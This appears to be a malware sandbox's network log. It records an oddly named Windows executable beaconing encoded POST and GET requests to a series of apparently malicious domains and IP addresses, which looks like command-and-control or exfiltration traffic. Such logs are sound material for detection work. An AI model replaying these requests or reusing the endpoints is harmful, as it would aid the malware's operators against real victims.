                                                                    Date: Wed, 30 Oct 2024 03:58:10 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 167
                                                                    Connection: close
                                                                    Cache-Control: max-age=3600
                                                                    Expires: Wed, 30 Oct 2024 04:58:10 GMT
                                                                    Location: https://www.bayarcepat19.click/g48c/
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Otnzjtrdb3yWZZJXTRG76t%2B2saHGR8XPTu6qGAZdkDhhjQY88LFxWmy8MpdGAo6nH0AG5PkG8xt0NQ%2BVcQVBQeaPC%2FLOB7JuPZwR1FknhK9%2FUOctmS%2FEkCxGHk3w2YHZ3rKkstZhnyk"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Vary: Accept-Encoding
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da87c468eb6ddb0-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1399&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1782&delivery_rate=0&cwnd=35&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                    Session ID: 24 | Source IP: 192.168.2.5 | Source Port: 50006 | Destination IP: 188.114.97.3 | Destination Port: 80 | PID: 1492
                                                                    Process: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:58:12.976897955 CET | 477 | OUT | GET /g48c/?vxPD=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehslCZThPKRDqwNE0F1xdz+i8CSvJHFK4MEqkJv66ZZdqE7/rLlhv1jvHawsWmzNBJFBDXYHMYLAOiBh9V/zUb3xtGimdQ==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.bayarcepat19.click
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:58:13.599725008 CET | 1166 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Date: Wed, 30 Oct 2024 03:58:13 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 167
                                                                    Connection: close
                                                                    Cache-Control: max-age=3600
                                                                    Expires: Wed, 30 Oct 2024 04:58:13 GMT
                                                                    Location: https://www.bayarcepat19.click/g48c/?vxPD=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehslCZThPKRDqwNE0F1xdz+i8CSvJHFK4MEqkJv66ZZdqE7/rLlhv1jvHawsWmzNBJFBDXYHMYLAOiBh9V/zUb3xtGimdQ==&7JH=bvSPlHnHQ4A
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v0bPkzQiNsWJVD6waWIQTD1l0VCTb7Jn99TwY2HTQKkqhu%2FMVxp%2FzK3nXKr%2B8%2BIlfRzEOnEqxDg5ULIekTwNaeVTWam1z6qE2QkQWqyTy8uTbYKuB1kf%2BR7NgzlBjwJ37OBLfaMKY4Tp"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da87c568ac2143d-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1130&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=477&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                    Session ID: 25 | Source IP: 192.168.2.5 | Source Port: 50007 | Destination IP: 206.119.82.147 | Destination Port: 80 | PID: 1492
                                                                    Process: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:58:18.677511930 CET | 721 | OUT | POST /jo6v/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.wdeb18.top
                                                                    Origin: http://www.wdeb18.top
                                                                    Referer: http://www.wdeb18.top/jo6v/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)


                                                                    Session ID: 26 | Source IP: 192.168.2.5 | Source Port: 50008 | Destination IP: 206.119.82.147 | Destination Port: 80 | PID: 1492
                                                                    Process: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:58:21.220747948 CET | 741 | OUT | POST /jo6v/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.wdeb18.top
                                                                    Origin: http://www.wdeb18.top
                                                                    Referer: http://www.wdeb18.top/jo6v/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)


                                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                    27         | 192.168.2.5 | 50009       | 206.119.82.147 | 80               | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:58:23.767502069 CET | 1758              | OUT       | POST /jo6v/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.wdeb18.top
                                                                    Origin: http://www.wdeb18.top
                                                                    Referer: http://www.wdeb18.top/jo6v/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)


                                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                    28         | 192.168.2.5 | 50010       | 206.119.82.147 | 80               | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:58:26.308629036 CET | 469               | OUT       | GET /jo6v/?vxPD=2MtP9xsvcXKXviIsu0vpU2PONZvfmv7hx3sLTV54B3JqqEM7biiUK4O8idRTqEg/3Cvc/KoIDU0zY+SEf5yzUNBsxxGwA99CFGRROpYSVV0FKk6l03kHnIpY1s/MIxOd0w==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.wdeb18.top
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)


                                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                    29         | 192.168.2.5 | 50011       | 162.0.209.213  | 80               | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:58:39.838634968 CET | 748               | OUT       | POST /sfat/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.galaxyslot88rtp.lat
                                                                    Origin: http://www.galaxyslot88rtp.lat
                                                                    Referer: http://www.galaxyslot88rtp.lat/sfat/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Ascii: vxPD=qf4xXmfLixOG3NbGf2+R73Kr2wBD6Z91YNfRHmk4oBshHP7LKx+mXe7feG1ARcXbwEyVztYlrn8pgEAgMDcMhzpfwhJxgJ4tVEdJSKQRZTofylXEqEEgT63nBu1dEmeUCIvO3A2tgNmZW53/md7EY7eU/c4RQ/g7MJllDsdrONMdvGJCs0bgZcEEMP1pED6ovPSERPY=
                                                                    Oct 30, 2024 04:58:40.511739969 CET | 1062              | IN        | HTTP/1.1 301 Moved Permanently
                                                                    keep-alive: timeout=5, max=100
                                                                    content-type: text/html
                                                                    content-length: 795
                                                                    date: Wed, 30 Oct 2024 03:58:40 GMT
                                                                    server: LiteSpeed
                                                                    location: https://www.galaxyslot88rtp.lat/sfat/
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    connection: close
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                    30         | 192.168.2.5 | 50012       | 162.0.209.213  | 80               | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:58:42.393445969 CET | 768               | OUT       | POST /sfat/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.galaxyslot88rtp.lat
                                                                    Origin: http://www.galaxyslot88rtp.lat
                                                                    Referer: http://www.galaxyslot88rtp.lat/sfat/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Ascii: vxPD=qf4xXmfLixOGl9rGdVGRqHKozwBDz588YNTRHjVjoyYhGqfLLzWmWe7fL21JMMXSwE+dzsklrkApgGYgMw0PgjpK/BJgvp4tVEdJSKU7ZTgfy1nErhwhNK3oCu1dAmePCIub3BqHgLqZW9z/mM7HS7eex85fWNQzBbpwGPBuXPIDuwko2WTIK8o8cc9eVzbB1sC0PYPdacz/A1wMGrIMeTRWTbU7
                                                                    Oct 30, 2024 04:58:43.058919907 CET | 1062              | IN        | HTTP/1.1 301 Moved Permanently
                                                                    keep-alive: timeout=5, max=100
                                                                    content-type: text/html
                                                                    content-length: 795
                                                                    date: Wed, 30 Oct 2024 03:58:42 GMT
                                                                    server: LiteSpeed
                                                                    location: https://www.galaxyslot88rtp.lat/sfat/
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    connection: close
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                    31         | 192.168.2.5 | 50013       | 162.0.209.213  | 80               | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:58:44.936626911 CET | 1785              | OUT       | POST /sfat/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.galaxyslot88rtp.lat
                                                                    Origin: http://www.galaxyslot88rtp.lat
                                                                    Referer: http://www.galaxyslot88rtp.lat/sfat/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:58:45.593148947 CET | 1062              | IN        | HTTP/1.1 301 Moved Permanently
                                                                    keep-alive: timeout=5, max=100
                                                                    content-type: text/html
                                                                    content-length: 795
                                                                    date: Wed, 30 Oct 2024 03:58:45 GMT
                                                                    server: LiteSpeed
                                                                    location: https://www.galaxyslot88rtp.lat/sfat/
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    connection: close
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                    32         | 192.168.2.5 | 50014       | 162.0.209.213  | 80               | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:58:47.476031065 CET | 478               | OUT       | GET /sfat/?7JH=bvSPlHnHQ4A&vxPD=ndQRUSq53iSLxvb8OFWfwTz47wZn0JkOZeX5JGA9kygqb7/vKRX/BZDIVWlzOZ6s0Fqu7sJ8lUpg5mYkJBBsoyg01CQ+qYMAZnZLVb86DHwbwWbBhRFgOPvzLtNlDmufAw== HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.galaxyslot88rtp.lat
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:58:48.152520895 CET | 1216              | IN        | HTTP/1.1 301 Moved Permanently
                                                                    keep-alive: timeout=5, max=100
                                                                    content-type: text/html
                                                                    content-length: 795
                                                                    date: Wed, 30 Oct 2024 03:58:48 GMT
                                                                    server: LiteSpeed
                                                                    location: https://www.galaxyslot88rtp.lat/sfat/?7JH=bvSPlHnHQ4A&vxPD=ndQRUSq53iSLxvb8OFWfwTz47wZn0JkOZeX5JGA9kygqb7/vKRX/BZDIVWlzOZ6s0Fqu7sJ8lUpg5mYkJBBsoyg01CQ+qYMAZnZLVb86DHwbwWbBhRFgOPvzLtNlDmufAw==
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    connection: close
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                    33         | 192.168.2.5 | 50015       | 3.33.130.190   | 80               | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:58:53.440233946 CET | 721               | OUT       | POST /zlyl/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.dto20.shop
                                                                    Origin: http://www.dto20.shop
                                                                    Referer: http://www.dto20.shop/zlyl/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Ascii: vxPD=DnTeUn8bQO0f8K7Q5ce7GPNCrzGcZ6X7fPWG25NECX9lWRP9Sf/J3iaeSwjJNp2cEaOFFtrdk81sGiT8vvvPRYeUd3upilrx8KiuxhO1q18kfFMcnYYSnzQyPRd4QwHyeuVwACryKF3U7tJtwQ+MMiAOYS4RqbDl4BlYWaF0czciBQ/jCx4VWQ99aT4Vt5QC1ZQDyDE=


                                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                    34         | 192.168.2.5 | 50016       | 3.33.130.190   | 80               | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:58:55.987848043 CET | 741               | OUT       | POST /zlyl/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.dto20.shop
                                                                    Origin: http://www.dto20.shop
                                                                    Referer: http://www.dto20.shop/zlyl/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Ascii: vxPD=DnTeUn8bQO0ftaLQ1bq7HvNduzGcQaX3fOqG25lUCkJlYVH9TbjJyiaeaQjMCJ2XEaynFsXdk8xsGiD8vc3IRIeSQXu3mlrx8KiuxluPqxokc18cl8ENrTQxfBd4UwH2euVoAD2fKHPU7pBtxB+DbSBFHi5aur2giA5MKbR3DwglJGSJYTw9FwRFKAwi8Jxrv6AzsUSXOpK4LbFtXMQ7sk3Po6yf


                                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                    35         | 192.168.2.5 | 50017       | 3.33.130.190   | 80               | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:58:58.529898882 CET | 1758              | OUT       | POST /zlyl/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.dto20.shop
                                                                    Origin: http://www.dto20.shop
                                                                    Referer: http://www.dto20.shop/zlyl/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 44 6e 54 65 55 6e 38 62 51 4f 30 66 74 61 4c 51 31 62 71 37 48 76 4e 64 75 7a 47 63 51 61 58 33 66 4f 71 47 32 35 6c 55 43 6c 78 6c 59 69 48 39 53 38 58 4a 31 69 61 65 47 41 6a 4e 43 4a 32 4f 45 65 65 6a 46 73 61 67 6b 2b 35 73 48 45 50 38 70 70 44 49 61 49 65 53 5a 33 75 71 69 6c 72 6b 38 4c 50 6e 78 68 4b 50 71 78 6f 6b 63 33 6b 63 32 49 59 4e 70 54 51 79 50 52 64 30 51 77 48 65 65 75 39 53 41 44 6a 69 4a 30 48 55 37 49 39 74 32 7a 57 44 5a 79 42 48 45 69 35 4a 75 72 71 72 69 41 6c 36 4b 61 55 63 44 77 49 6c 59 77 4b 55 48 53 59 30 52 54 42 48 46 7a 6b 6c 75 66 35 74 6d 35 6c 42 6a 47 2b 48 48 72 4b 68 63 63 59 71 5a 74 31 58 7a 56 6a 69 34 73 6a 54 33 4a 54 6c 31 54 2f 53 34 45 4c 63 4b 33 56 50 7a 43 4a 50 62 6e 57 55 59 2b 31 69 76 68 4b 41 35 67 33 6b 65 45 4d 75 63 6c 54 77 78 51 36 76 49 75 71 6f 43 33 74 73 43 2b 55 42 65 42 37 69 74 76 58 68 71 79 51 6c 4d 6b 67 39 6c 6d 5a 4d 48 59 4d 63 42 76 4a 6f 50 31 62 74 51 34 51 55 6c 4c 55 78 4b 33 4f 37 4a 74 61 46 66 45 79 4d 35 [TRUNCATED]
                                                                    Data Ascii: vxPD=[TRUNCATED]


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    36 | 192.168.2.5 | 50018 | 3.33.130.190 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:59:01.072371960 CET | 469 | OUT | GET /zlyl/?vxPD=Ol7+XR9be+0p6ZvC9qKVEv0Hj0TGab+KR+2v1t8GCnFaAg3dec/002KiYj/aEuecGLCmVtqBzfUyHhXipe21UKmYS12AvSLU6uuH/hqX9wcAM20fmpYouhsYXjVvYDGKbw==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.dto20.shop
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:59:01.726975918 CET | 408 | IN | HTTP/1.1 200 OK
                                                                    Server: openresty
                                                                    Date: Wed, 30 Oct 2024 03:59:01 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 268
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 78 50 44 3d 4f 6c 37 2b 58 52 39 62 65 2b 30 70 36 5a 76 43 39 71 4b 56 45 76 30 48 6a 30 54 47 61 62 2b 4b 52 2b 32 76 31 74 38 47 43 6e 46 61 41 67 33 64 65 63 2f 30 30 32 4b 69 59 6a 2f 61 45 75 65 63 47 4c 43 6d 56 74 71 42 7a 66 55 79 48 68 58 69 70 65 32 31 55 4b 6d 59 53 31 32 41 76 53 4c 55 36 75 75 48 2f 68 71 58 39 77 63 41 4d 32 30 66 6d 70 59 6f 75 68 73 59 58 6a 56 76 59 44 47 4b 62 77 3d 3d 26 37 4a 48 3d 62 76 53 50 6c 48 6e 48 51 34 41 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vxPD=Ol7+XR9be+0p6ZvC9qKVEv0Hj0TGab+KR+2v1t8GCnFaAg3dec/002KiYj/aEuecGLCmVtqBzfUyHhXipe21UKmYS12AvSLU6uuH/hqX9wcAM20fmpYouhsYXjVvYDGKbw==&7JH=bvSPlHnHQ4A"}</script></head></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    37 | 192.168.2.5 | 50019 | 144.34.186.85 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:59:06.812457085 CET | 736 | OUT | POST /ni9w/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.h5hph710am.site
                                                                    Origin: http://www.h5hph710am.site
                                                                    Referer: http://www.h5hph710am.site/ni9w/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
